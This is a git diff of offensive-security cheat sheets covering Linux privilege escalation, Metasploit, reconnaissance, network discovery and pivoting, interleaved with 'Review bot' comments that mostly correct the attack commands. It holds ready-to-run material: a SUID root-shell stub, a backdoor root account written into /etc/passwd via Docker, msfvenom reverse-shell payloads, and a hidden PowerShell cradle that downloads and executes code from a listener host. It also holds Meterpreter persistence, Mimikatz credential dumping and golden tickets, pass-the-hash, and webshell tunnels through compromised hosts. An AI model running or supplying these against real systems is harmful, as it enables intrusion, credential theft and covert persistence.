int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
char *file = SHELL;
char *argv[] = {SHELL,0};
setresuid(geteuid(),geteuid(), geteuid());
execve(file,argv,0);
}
```
## Groups
### Docker
Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
```bash
$> docker run -it --rm -v $PWD:/mnt bash
$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
```
Almost similar but you will also see all processes running on the host and be connected to the same NICs.
```powershell
docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
```
Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
```powershell
$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
latest: Pulling from chrisfosterelli/rootplease
2de59b831a23: Pull complete
354c3661655e: Pull complete
91930878a2d7: Pull complete
a3ed95caeb02: Pull complete
489b110c54dc: Pull complete
Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
Status: Downloaded newer image for chrisfosterelli/rootplease:latest
You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
```
### LXC/LXD
The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
```powershell
swissky@lab ~
$ id
uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel)
```
Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.
```powershell
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
./build-alpine -a i686
# import the image
lxc image import ./alpine.tar.gz --alias myimage
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
```
Alternatively https://github.com/initstring/lxd_root
## Kernel Exploits
Precompiled exploits can be found inside these repositories, run them at your own risk !
* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
The following exploits are known to work well.
### CVE-2016-5195 (DirtyCow)
Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
```powershell
# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
```
### CVE-2010-3904 (RDS)
Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
```powershell
https://www.exploit-db.com/exploits/15285/
```
### CVE-2010-4258 (Full Nelson)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
```powershell
https://www.exploit-db.com/exploits/15704/
```
### CVE-2012-0056 (Mempodipper)
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
```powershell
https://www.exploit-db.com/exploits/18411
```
## References
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
- [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
- [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
- [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
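Review bot: the "Create a SUID binary" block uses `print` to write the C source, which is not a shell builtin, and the C it writes calls `setresuid` without `#include <unistd.h>`; use `printf` (the `\n` escapes need it anyway) and add the include, otherwise the file is never written and the compile warns or, on current gcc, fails. More in the same hunk: the Wildcard example writes its script with `echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh`, but bash's builtin `echo` does not expand `\n` and `\!` stays literal inside double quotes, so `shell.sh` is one malformed line (again `printf`); the Writable files search `find / -writable ! -user \`whoami\` ...` carries markdown backslash escapes inside a code fence, which the shell turns into literal backticks, so `find` aborts on an unknown user instead of substituting the current one; `gcc Wall fPIC shared o vulnlib.so /tmp/vulnlib.c` in the ldconfig section has lost the leading dash on every option; the LD_PRELOAD and RPATH C snippets also lack `#include <unistd.h>` for setuid/setgid/setresuid/geteuid/execve, and both are fenced as ```powershell; and the Docker example mounts `-v $PWD:/mnt` yet appends to `/mnt/etc/passwd`, which only touches the host's `/etc/passwd` when the command is run from `/` (say so, or mount `/` explicitly as the `--privileged` example below it does). Navigation: the Summary links `#checklist` but the heading is `## Checklists`, `#ld-preload-and-passwd` does not match "LD_PRELOAD and NOPASSWD", the RDS entry has a stray `[` in `(#[CVE-2010-3904-rds)`, and `## Systemd timers` should be `###` since the Summary nests it under Scheduled tasks; the last reference line uses `*` where the rest of that list uses `-`.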

@@ -0,0 +1,222 @@
# Metasploit
## Summary
* [Installation](#installation)
* [Sessions](#sessions)
* [Background handler](#background-handler)
* [Meterpreter - Basic](#meterpreter---basic)
* [Generate a meterpreter](#generate-a-meterpreter)
* [Meterpreter Webdelivery](#meterpreter-webdelivery)
* [Get System](#get-system)
* [Persistence Startup](#persistence-startup)
* [Portforward](#portforward)
* [Upload / Download](#upload---download)
* [Execute from Memory](#execute-from-memory)
* [Mimikatz](#mimikatz)
* [Pass the Hash - PSExec](#pass-the-hash---psexec)
* [Scripting Metasploit](#scripting-metasploit)
* [Multiple transports](#multiple-transports)
* [Best of - Exploits](#best-of---exploits)
* [References](#references)
## Installation
```powershell
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
```
or docker
```powershell
sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
```
## Sessions
```powershell
CTRL+Z -> Session in Background
sessions -> List sessions
sessions -i session_number -> Interact with Session with id
sessions -u session_number -> Upgrade session to a meterpreter
sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter
sessions -c cmd -> Execute a command on several sessions
sessions -i 10-20 -c "id" -> Execute a command on several sessions
```
## Background handler
ExitOnSession : the handler will not exit if the meterpreter dies.
```powershell
screen -dRR
sudo msfconsole
use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
generate -o /tmp/meterpreter.exe -f exe
to_handler
[ctrl+a] + [d]
```
## Meterpreter - Basic
### Generate a meterpreter
```powershell
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
```
### Meterpreter Webdelivery
Set up a Powershell web delivery listening on port 8080.
```powershell
use exploit/multi/script/web_delivery
set TARGET 2
set payload windows/x64/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 4444
run
```
```powershell
powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');
```
### Get System
```powershell
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
### Persistence Startup
```powershell
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -U -p 4242
```
### Portforward
```powershell
portfwd add -l 7777 -r 172.17.0.2 -p 3006
```
### Upload / Download
```powershell
upload /path/in/hdd/payload.exe exploit.exe
download /path/in/victim
```
### Execute from Memory
```powershell
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
```
### Mimikatz
```powershell
load mimikatz
mimikatz_command -f version
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::wdigest
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords full
```
```powershell
load kiwi
creds_all
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
```
### Pass the Hash - PSExec
```powershell
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > exploit
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass 598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf no The password for the specified username
SMBUser Lambda no The username to authenticate as
```
## Scripting Metasploit
Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`.
Here is a simple example to script the deployment of a handler an create an Office doc with macro.
```powershell
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 4646
set ExitOnSession false
exploit -j -z
use exploit/multi/fileformat/office_word_macro
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.10.14.22
set LPORT 4646
exploit
```
## Multiple transports
```powershell
msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe
```
Then, in AddTransports.ps1
```powershell
Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30
```
## Best of - Exploits
* MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
* MS08_67 - `exploit/windows/smb/ms08_067_netapi`
## References
* [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)
* [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331)
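Review bot: the Pass the Hash block runs `exploit` before any credential is set, and what follows it reads as pasted `show options` output rather than commands; a reader copying it verbatim gets an unconfigured module. Replace the three option-table lines with `set SMBUser Lambda`, `set SMBPass <LM>:<NT>` and `set SMBDomain WORKGROUP` placed before `exploit`, and say that `SMBPass` takes the LM:NT pair (an empty LM half is fine). Smaller documentation fixes in the same file: `<SID without le RID>` should read `<SID without the RID>`, "a handler an create an Office doc" should be "a handler and create", and the exploit names should be `MS17-010` and `MS08-067` (the module paths are right, the labels are not). The `execute` line would also benefit from a comment that `-a -w` passes `-w` as the argument to `wce.exe` rather than being two meterpreter flags.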

View File

@@ -8,6 +8,7 @@
* The Harvester * The Harvester
* [Active Recon](#active-recon) * [Active Recon](#active-recon)
* Masscan
* Nmap * Nmap
* Nmap Script * Nmap Script
* RPCClient * RPCClient
@@ -47,6 +48,13 @@
## Active recon ## Active recon
* Masscan
```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
```
* Basic NMAP * Basic NMAP
```bash ```bash
@@ -168,6 +176,18 @@
index: 0x8 Account: root Name: root Desc: (null) index: 0x8 Account: root Name: root Desc: (null)
``` ```
* Zone Transfer
```powershell
host -t ns domain.local
domain.local name server master.domain.local.
host master.domain.local
master.domain.local has address 192.168.1.1
dig axfr domain.local @192.168.1.1
```
## List all the subdirectories and files ## List all the subdirectories and files
* Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
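Review bot: in the Zone Transfer block the commands and their output are interleaved with nothing to tell them apart (`host -t ns domain.local` is immediately followed by the line it prints, then `host master.domain.local` by its answer), so the block cannot be pasted and a reader has to guess which lines are typed. Prefix the command lines (`$ host -t ns domain.local`) or comment the output lines, and consider noting that `dig axfr domain.local @master.domain.local` would skip the intermediate address lookup.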
@@ -268,7 +288,7 @@ International test card numbers and tokens
| 4000002460000001 | tok_fi | Finland (FI) | Visa | | 4000002460000001 | tok_fi | Finland (FI) | Visa |
| 4000002500000003 | tok_fr | France (FR) | Visa | | 4000002500000003 | tok_fr | France (FR) | Visa |
## Thanks to ## References
* [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/) * [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
* [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)

View File

@@ -1,38 +1,14 @@
# Network Discovery # Network Discovery
## Netdiscover ## Summary
```powershell - [Nmap](#nmap)
netdiscover -i eth0 -r 192.168.1.0/24 - [Masscan](#masscan)
Currently scanning: Finished! | Screen View: Unique Hosts - [Netdiscover](#netdiscover)
- [Responder](#responder)
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 - [Bettercap](#bettercap)
_____________________________________________________________________________ - [Reconnoitre](#reconnoitre)
IP At MAC Address Count Len MAC Vendor / Hostname - [References](#references)
-----------------------------------------------------------------------------
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
```
## Responder
```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
## Bettercap
```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```
## Nmap ## Nmap
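Review bot: the new Summary lists Netdiscover, Responder and Bettercap before Reconnoitre, but the sections are being moved in this same change to sit after Reconnoitre (Masscan, Reconnoitre, Netdiscover, Responder, Bettercap, References). The anchors still resolve, but the table of contents should follow file order; reorder the Summary to `Nmap, Masscan, Reconnoitre, Netdiscover, Responder, Bettercap, References`.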
@@ -40,6 +16,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
```powershell ```powershell
nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down" nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
-sn : Disable port scanning. Host discovery only.
-n : Never do DNS resolution
``` ```
* Basic NMAP * Basic NMAP
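Review bot: `-sn` and `-n` now get a one-line explanation but `--disable-arp-ping`, the flag that most changes the behaviour of this sweep, is still unexplained. On a directly attached subnet Nmap discovers hosts with ARP requests by default, which is faster and more reliable than IP probes; disabling it forces the regular ICMP/TCP discovery probes and mainly makes sense when the target range sits behind a router or a VPN tunnel. Add a third line such as `--disable-arp-ping : Use ICMP/TCP discovery probes even on the local subnet`.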
@@ -119,6 +97,16 @@ Host script results:
List Nmap scripts : ls /usr/share/nmap/scripts/ List Nmap scripts : ls /usr/share/nmap/scripts/
``` ```
## Masscan
```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
```
## Reconnoitre ## Reconnoitre
Dependencies: Dependencies:
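Review bot: the first two Masscan lines are identical to the two lines this change adds to the Methodology file (`-iL ips-online.txt --rate 10000 ...` and `-e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000`); keeping both copies means they drift apart, so the Methodology file should point here instead. Two documentation points on the remaining lines: `$ROUTER_IP`, `$NETWORK` and `$MACHINE_IP` are shell variables the reader has to export first and deserve a comment, and `-oL $MACHINE_IP/scans/masscan-ports.lst` fails unless `$MACHINE_IP/scans/` already exists, since masscan does not create output directories (a `mkdir -p` before it, or a note, would avoid a confusing error).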
@@ -133,6 +121,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
If you have a segfault with nbtscan, read the following quote. If you have a segfault with nbtscan, read the following quote.
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
## Thanks ## Netdiscover
```powershell
netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom
192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor
192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.
192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD
```
## Responder
```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```
Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
## Bettercap
```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```
## References
* [TODO](TODO) * [TODO](TODO)
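Review bot: the Bettercap line (`bettercap -X --proxy --proxy-https -T <target IP>`) is the command syntax of the legacy Ruby bettercap 1.x; the Go rewrite (2.x) that current distributions ship drops these flags in favour of modules (`net.probe on`, `arp.spoof on`, `http.proxy on`, with `set arp.spoof.targets <target IP>`). Since the section is only being moved, either label it as the 1.x syntax or update it. The Responder line `responder.py -I eth0 -wrf` would read better with the flags spelled out (`-w` starts the WPAD rogue proxy, `-r` answers NetBIOS wredir suffix queries, `-f` fingerprints hosts that issued NBT-NS/LLMNR queries), mirroring the comment already given for `-A`. The References section renamed here still contains only `[TODO](TODO)`; either fill it or remove the placeholder.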

View File

@@ -1,5 +1,26 @@
# Network Pivoting Techniques # Network Pivoting Techniques
## Summary
* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding)
* [SSH](#ssh)
* [SOCKS Proxy](#socks-proxy)
* [Local Port Forwarding](#local-port-forwarding)
* [Remote Port Forwarding](#remote-port-forwarding)
* [Proxychains](#proxychains)
* [Web SOCKS - reGeorg](#web-socks---regeorg)
* [Metasploit](#metasploit)
* [sshuttle](#sshuttle)
* [chisel](#chisel)
* [Rpivot](#rpivot)
* [plink](#plink)
* [ngrok](#ngrok)
* [Basic Pivoting Types](#basic-pivoting-types)
* [Listen - Listen](#listen---listen)
* [Listen - Connect](#listen---connect)
* [Connect - Connect](#connect---connect)
* [References](#references)
## Windows netsh Port Forwarding ## Windows netsh Port Forwarding
```powershell ```powershell
@@ -42,6 +63,7 @@ ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
```bash ```bash
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host] ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
``` ```
## Proxychains ## Proxychains
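Review bot: the added example `ssh -R 3389:10.1.1.224:3389 root@10.11.0.32` forwards to a third host (10.1.1.224), while the template line above it still says `-R [bindaddr]:[port]:[localhost]:[localport]`, so the example does not match the syntax it illustrates. Generalise the template to `-R [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]` (forwarding to localhost is just the special case), and add a note that the remote side binds to loopback only unless the SSH server has `GatewayPorts yes`, which is the usual reason such a forward is reachable from the jump host but from nowhere else.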
@@ -59,8 +81,86 @@ Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
[reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
Drop one of the following files on the server:
- tunnel.ashx
- tunnel.aspx
- tunnel.js
- tunnel.jsp
- tunnel.nosocket.php
- tunnel.php
- tunnel.tomcat.5.jsp
```python ```python
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
optional arguments:
-h, --help show this help message and exit
-l , --listen-on The default listening address
-p , --listen-port The default listening port
-r , --read-buff Local read buffer, max data to be sent per POST
-u , --url The url containing the tunnel script
-v , --verbose Verbose output[INFO|DEBUG]
```
## Metasploit
```powershell
# Meterpreter list active port forwards
portfwd list
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add l 3389 p 3389 r target-host
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete l 3389 p 3389 r target-host
# Meterpreter delete all port forwards
portfwd flush
or
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24
use auxiliary/server/socks4a
# Meterpreter list all active routes
run autoroute -p
route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3
# Meterpreter delete all routes
route flush
```
## sshuttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
* Doesn't require admin.
* Works with Linux and MacOS.
* Supports DNS tunneling.
```powershell
pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24
```
## chisel
```powershell
go get -v github.com/jpillora/chisel
# forward port 389 and 88 to hacker computer
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
``` ```
## Rpivot ## Rpivot
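Review bot: two of the Meterpreter lines are missing their option dashes and will not parse as written: `portfwd add l 3389 p 3389 r target-host` and `portfwd delete l 3389 p 3389 r target-host` need `-l 3389 -p 3389 -r target-host`, as the two correct `portfwd add` lines just below them show. The comment above the `delete` line also repeats the one above `add` ("Forwards 3389 (RDP) to 3389 ...") and should say that it removes that forward. In the sshuttle section, "Doesn't require admin" is wrong in the direction that matters: sshuttle needs root on the attacker's machine (it calls sudo to install the iptables/pf redirect rules) and only needs a Python interpreter, no privileges, on the pivot host; rephrase to "No root needed on the remote host (root via sudo on the local side)".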
@@ -97,9 +197,26 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
```powershell ```powershell
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw mypassword 192.168.18.84 -R plink -l root -pw mypassword 192.168.18.84 -R
plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
``` ```
## ngrok
```powershell
# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm
# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433
```
## Basic Pivoting Types ## Basic Pivoting Types
| Type | Use Case | | Type | Use Case |
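Review bot: `./ngrok http 4433` and `./ngrok tcp 4433` are presented under one comment as the same thing, but `http` creates an HTTP tunnel terminated at ngrok's edge and is only useful for serving web payloads, whereas catching a raw reverse shell requires `tcp`; split the comment so the reader picks the right one. On the plink line `plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445`, it is worth saying that the password is visible in the process list and shell history, and that on first contact plink blocks on the host-key confirmation prompt, which hangs when run from a non-interactive reverse shell; the usual workaround is `echo y | plink.exe ...`.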
@@ -108,7 +225,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
| Listen - Connect | Normal redirect. | | Listen - Connect | Normal redirect. |
| Connect - Connect | Cant bind, so connect to bridge two hosts | | Connect - Connect | Cant bind, so connect to bridge two hosts |
## Listen - Listen ### Listen - Listen
| Type | Use Case | | Type | Use Case |
| :------------- | :------------------------------------------ | | :------------- | :------------------------------------------ |
@@ -117,7 +234,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
| remote host 1 | `ncat localhost 8080 < file` | | remote host 1 | `ncat localhost 8080 < file` |
| remote host 2 | `ncat localhost 9090 > newfile` | | remote host 2 | `ncat localhost 9090 > newfile` |
## Listen - Connect ### Listen - Connect
| Type | Use Case | | Type | Use Case |
| :------------- | :------------------------------------------ | | :------------- | :------------------------------------------ |
@@ -126,7 +243,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
| remote host 1 | `ncat localhost -p 8080 < file` | | remote host 1 | `ncat localhost -p 8080 < file` |
| remote host 2 | `ncat -l -p 9090 > newfile` | | remote host 2 | `ncat -l -p 9090 > newfile` |
## Connect - Connect ### Connect - Connect
| Type | Use Case | | Type | Use Case |
| :------------- | :------------------------------------------ | | :------------- | :------------------------------------------ |
@@ -135,9 +252,10 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
| remote host 1 | `ncat -l -p 8080 < file | | remote host 1 | `ncat -l -p 8080 < file |
| remote host 2 | `ncat -l -p 9090 > newfile` | | remote host 2 | `ncat -l -p 9090 > newfile` |
## Thanks to ## References
* [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
* [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
